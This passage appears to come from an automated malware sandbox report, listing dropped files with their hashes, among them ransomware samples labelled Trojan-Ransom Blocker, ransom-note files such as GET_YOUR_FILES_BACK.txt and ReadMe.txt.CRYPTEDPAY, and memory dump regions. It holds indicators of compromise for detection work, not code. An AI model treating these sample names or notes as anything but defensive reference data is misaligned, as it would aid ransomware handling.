                            d38fd7b985618045a015257f76b115ad1c751ad9d8003d9c41af6f9fa8d7c918

                            SHA512

                            a177e3ef3c126b41dddede3e9dc0e6df748215447a018d97bacdb0191e7a46149bb6d7f9fc49a088588fe77be0637130502497f8cf64abd45ef0d13015bdb147

                          • C:\Users\Admin\Desktop\00468\HEUR-Trojan-Ransom.Win32.Blocker.gen-57f67d542cc71d54e87a4416a65945b1315def54b9a0077d2f6049fefb9bdf05.exe

                            Filesize

                            181KB

                            MD5

                            652ba7e19b0874c59384c1f3c8f803f8

                            SHA1

                            7fe145ce24ae06d5508b438026c21b9e23669e18

                            SHA256

                            57f67d542cc71d54e87a4416a65945b1315def54b9a0077d2f6049fefb9bdf05

                            SHA512

                            e505abf45a25bef294683d0434be51459133957c558591606bd6319937be2e10c14d99878fecd3d977b5e865a838ef101eb57f26d227d63d3bd60c6de4f4b691

                          • C:\Users\Admin\Desktop\00468\HEUR-Trojan-Ransom.Win32.Blocker.pef-a59ca7e47a756d325818eb3b6ae1e423ffe1847131d7be1795a81522f7c64d3f.exe

                            Filesize

                            50KB

                            MD5

                            027df9ea670fd833df0622169548f40b

                            SHA1

                            d715ba18df48c1bbab957cc9e01c8e30306977ec

                            SHA256

                            a59ca7e47a756d325818eb3b6ae1e423ffe1847131d7be1795a81522f7c64d3f

                            SHA512

                            60b0154a21c619c0fccb3b52b227d03f550569315c173723c0ad81e3ab24bb4800814473ae7f26cf02a5a7c5b89ffed668585ee527cf9030e038898c7ef9f373

                          • C:\Users\Admin\Favorites\Links\ReadMe.txt.CRYPTEDPAY

                            Filesize

                            3KB

                            MD5

                            374bb836b330cf038a7828870beaa732

                            SHA1

                            67be8aeb44074f4b6fb561114176c4660e118a57

                            SHA256

                            8921a2459cccd6e1e9bb6728c6f2a69cae4ba1919da63ca29499f18321c03df5

                            SHA512

                            7be572e2b0d850d816dbecb5f74c638ac304852c0b66f02bbfaf1c038c19714b035a18188a33a83286e655684450417476feaf0ab70024f34d7533e87b20d09c

                          • C:\Users\Admin\Pictures\README.txt

                            Filesize

                            386B

                            MD5

                            dc4f14b4841f142d9fb5c2920186f536

                            SHA1

                            5c151f82e0f99c7d11e41e001adb916d2adb2c0f

                            SHA256

                            17692594613b8217a63430bee1a234559903bbd8d7e798d46d34980c74a9fd2a

                            SHA512

                            f9fd38e009eec846a5860817c8bea25ab8effb63bf9960718a6995158442b11186a6594fccaf2a0c198f81535dc637babd502315562a03a6186c21d65fd03c80

                          • C:\Users\Admin\Pictures\Recovery.bmp

                            Filesize

                            1.8MB

                            MD5

                            db23b38264589a1fdddc763f96f9e77c

                            SHA1

                            1f66752e25ccf1db795046716d1b828476f86077

                            SHA256

                            48f6c46e9c929e1c44607abcaacdff26093cb5822d52a114800865c96ae58a52

                            SHA512

                            47d0ddf354d0e0edb7b752490ae90ece24c7a29ef0c2322756a8737bb063364594566dd04b66513b00db3ac5a4cb0c8bebcfc453ff941550aeb3d543414a4763

                          • C:\Users\Default\Saved Games\GET_YOUR_FILES_BACK.txt

                            Filesize

                            1KB

                            MD5

                            c416bf3911487d819c45a4001a77b35f

                            SHA1

                            dc19ce5f2f104f710edf83f7efa617f0bc749f67

                            SHA256

                            76bbf445e90dffd6d609e98faad6f84f7dc99c5412026cfb1a6e224b1cb2e6e2

                            SHA512

                            b6ace2a4c58ec68a60b1e1640e5adc1abbc58c669bc0d24f1cc5e1a778d595b5c255c4cc0314f7b3e4a413759658c6c281dafaa59e1110d05119b17d00555e5d

                          • F:\ReadMe.txt.CRYPTEDPAY

                            Filesize

                            3KB

                            MD5

                            a85082baa1d8adeae9d9743da58b3000

                            SHA1

                            2ef0e4b1b3f114af57e88cdc8fba35837784433d

                            SHA256

                            742a72bddf5f4772d9615338b20459046f8746d3391912de037110d6eb13ed8e

                            SHA512

                            49488755f6223bb0a11c20e31b4318021aec213847b7ee916f8e334d37d51af4475732a8b51f53cd6624d92b095c669529de0948cef7ec26f8361b2f0b9210bb

                          • memory/672-1964-0x0000000005860000-0x0000000005888000-memory.dmp

                            Filesize

                            160KB

                          • memory/672-230-0x0000000000970000-0x0000000000B30000-memory.dmp

                            Filesize

                            1.8MB

                          • memory/740-214-0x0000000000080000-0x0000000000092000-memory.dmp

                            Filesize

                            72KB

                          • memory/1152-210-0x00000000004F0000-0x0000000000506000-memory.dmp

                            Filesize

                            88KB

                          • memory/1344-176-0x00000267B9220000-0x00000267B9221000-memory.dmp

                            Filesize

                            4KB

                          • memory/1344-172-0x00000267B9220000-0x00000267B9221000-memory.dmp

                            Filesize

                            4KB

                          • memory/1344-179-0x00000267B9220000-0x00000267B9221000-memory.dmp

                            Filesize

                            4KB

                          • memory/1344-178-0x00000267B9220000-0x00000267B9221000-memory.dmp

                            Filesize

                            4KB

                          • memory/1344-181-0x00000267B9220000-0x00000267B9221000-memory.dmp

                            Filesize

                            4KB

                          • memory/1344-177-0x00000267B9220000-0x00000267B9221000-memory.dmp

                            Filesize

                            4KB

                          • memory/1344-182-0x00000267B9220000-0x00000267B9221000-memory.dmp

                            Filesize

                            4KB

                          • memory/1344-180-0x00000267B9220000-0x00000267B9221000-memory.dmp

                            Filesize

                            4KB

                          • memory/1344-170-0x00000267B9220000-0x00000267B9221000-memory.dmp

                            Filesize

                            4KB

                          • memory/1344-171-0x00000267B9220000-0x00000267B9221000-memory.dmp

                            Filesize

                            4KB

                          • memory/1916-199-0x0000023DC5F10000-0x0000023DC5F2E000-memory.dmp

                            Filesize

                            120KB

                          • memory/1916-158-0x0000023DC3910000-0x0000023DC3932000-memory.dmp

                            Filesize

                            136KB

                          • memory/1916-169-0x0000023DC5F50000-0x0000023DC5FC6000-memory.dmp

                            Filesize

                            472KB

                          • memory/1916-168-0x0000023DC39B0000-0x0000023DC39F4000-memory.dmp

                            Filesize

                            272KB

                          • memory/2808-228-0x0000000004DA0000-0x0000000004E3C000-memory.dmp

                            Filesize

                            624KB

                          • memory/2808-241-0x0000000005BC0000-0x0000000005D66000-memory.dmp

                            Filesize

                            1.6MB

                          • memory/2808-227-0x0000000000510000-0x0000000000544000-memory.dmp

                            Filesize

                            208KB

                          • memory/2808-232-0x0000000005460000-0x0000000005A04000-memory.dmp

                            Filesize

                            5.6MB

                          • memory/2808-240-0x0000000004FF0000-0x0000000005046000-memory.dmp

                            Filesize

                            344KB

                          • memory/2808-239-0x0000000004E80000-0x0000000004E8A000-memory.dmp

                            Filesize

                            40KB

                          • memory/2808-234-0x0000000004F50000-0x0000000004FE2000-memory.dmp

                            Filesize

                            584KB

                          • memory/3508-359-0x000001F400060000-0x000001F40009A000-memory.dmp

                            Filesize

                            232KB

                          • memory/3508-245-0x000001F462B90000-0x000001F463880000-memory.dmp

                            Filesize

                            12.9MB

                          • memory/3508-304-0x000001F47DC80000-0x000001F47DCF6000-memory.dmp

                            Filesize

                            472KB

                          • memory/3508-293-0x000001F47DE50000-0x000001F47E5D6000-memory.dmp

                            Filesize

                            7.5MB

                          • memory/3508-348-0x000001F400810000-0x000001F4008CC000-memory.dmp

                            Filesize

                            752KB

                          • memory/3508-358-0x000001F400040000-0x000001F400058000-memory.dmp

                            Filesize

                            96KB

                          • memory/3508-380-0x000001F400B50000-0x000001F400B9A000-memory.dmp

                            Filesize

                            296KB

                          • memory/3508-390-0x000001F400BA0000-0x000001F400C30000-memory.dmp

                            Filesize

                            576KB

                          • memory/3508-360-0x000001F4008D0000-0x000001F400950000-memory.dmp

                            Filesize

                            512KB

                          • memory/3584-1050-0x000000001D0B0000-0x000000001D14C000-memory.dmp

                            Filesize

                            624KB

                          • memory/3584-233-0x000000001C770000-0x000000001C816000-memory.dmp

                            Filesize

                            664KB

                          • memory/3584-229-0x000000001C2A0000-0x000000001C76E000-memory.dmp

                            Filesize

                            4.8MB

                          • memory/3584-236-0x000000001C890000-0x000000001C8F2000-memory.dmp

                            Filesize

                            392KB

                          • memory/4180-238-0x00000000001E0000-0x00000000002AE000-memory.dmp

                            Filesize

                            824KB

                          • memory/4180-4406-0x00000000061E0000-0x00000000061E6000-memory.dmp

                            Filesize

                            24KB

                          • memory/4180-2024-0x0000000006350000-0x0000000006372000-memory.dmp

                            Filesize

                            136KB

                          • memory/4180-4405-0x0000000006180000-0x0000000006194000-memory.dmp

                            Filesize

                            80KB

                          • memory/4352-209-0x00000000007C0000-0x000000000085E000-memory.dmp

                            Filesize

                            632KB

                          • memory/5016-1824-0x0000000000400000-0x000000000045F000-memory.dmp

                            Filesize

                            380KB

                          • memory/5016-1825-0x00000000005F0000-0x0000000000607000-memory.dmp

                            Filesize

                            92KB

                          • memory/5716-905-0x0000000002020000-0x000000000203C000-memory.dmp

                            Filesize

                            112KB

                          • memory/5716-1049-0x0000000005070000-0x00000000050D6000-memory.dmp

                            Filesize

                            408KB

                          • memory/5716-978-0x00000000023F0000-0x000000000240A000-memory.dmp

                            Filesize

                            104KB

                          • memory/5736-1932-0x0000000000400000-0x0000000000409000-memory.dmp

                            Filesize

                            36KB

                          • memory/5736-1392-0x0000000000400000-0x0000000000409000-memory.dmp

                            Filesize

                            36KB

                          • memory/5928-1290-0x0000000000400000-0x0000000000409000-memory.dmp

                            Filesize

                            36KB

                          • memory/5928-1394-0x0000000000400000-0x0000000000409000-memory.dmp

                            Filesize

                            36KB

                          • memory/6044-1413-0x0000000000400000-0x00000000005BB000-memory.dmp

                            Filesize

                            1.7MB

                          • memory/6044-2558-0x0000000000400000-0x00000000005BB000-memory.dmp

                            Filesize

                            1.7MB

                          • memory/6092-1957-0x0000000000400000-0x0000000000533000-memory.dmp

                            Filesize

                            1.2MB

                          • memory/6092-2997-0x0000000000400000-0x0000000000533000-memory.dmp

                            Filesize

                            1.2MB

                          • memory/6092-3951-0x0000000000400000-0x0000000000533000-memory.dmp

                            Filesize

                            1.2MB

                          • memory/6800-4410-0x0000000000400000-0x000000000043C000-memory.dmp

                            Filesize

                            240KB

                          • memory/6800-4417-0x0000000005840000-0x0000000005858000-memory.dmp

                            Filesize

                            96KB

                          • memory/6800-4439-0x0000000005410000-0x0000000005460000-memory.dmp

                            Filesize

                            320KB

                          • memory/7616-4412-0x0000000000400000-0x0000000000537000-memory.dmp

                            Filesize

                            1.2MB

                          • memory/7616-2028-0x0000000000400000-0x0000000000537000-memory.dmp

                            Filesize

                            1.2MB

                          • memory/7616-2026-0x0000000000400000-0x0000000000537000-memory.dmp

                            Filesize

                            1.2MB

                          • memory/7616-4415-0x0000000000400000-0x0000000000537000-memory.dmp

                            Filesize

                            1.2MB

                          • memory/7616-3937-0x0000000000400000-0x0000000000537000-memory.dmp

                            Filesize

                            1.2MB

                          • memory/7616-4414-0x0000000000400000-0x0000000000537000-memory.dmp

                            Filesize

                            1.2MB

                          • memory/7616-4416-0x0000000000400000-0x0000000000537000-memory.dmp

                            Filesize

                            1.2MB

                          • memory/7616-3935-0x0000000000400000-0x0000000000537000-memory.dmp

                            Filesize

                            1.2MB

                          • memory/7616-4420-0x0000000000400000-0x0000000000537000-memory.dmp

                            Filesize

                            1.2MB

                          • memory/7616-3936-0x0000000000400000-0x0000000000537000-memory.dmp

                            Filesize

                            1.2MB

                          • memory/7816-1786-0x0000000000400000-0x0000000000537000-memory.dmp

                            Filesize

                            1.2MB

                          • memory/7816-1994-0x0000000000400000-0x0000000000537000-memory.dmp

                            Filesize

                            1.2MB

                          • memory/7816-1787-0x0000000000400000-0x0000000000537000-memory.dmp

                            Filesize

                            1.2MB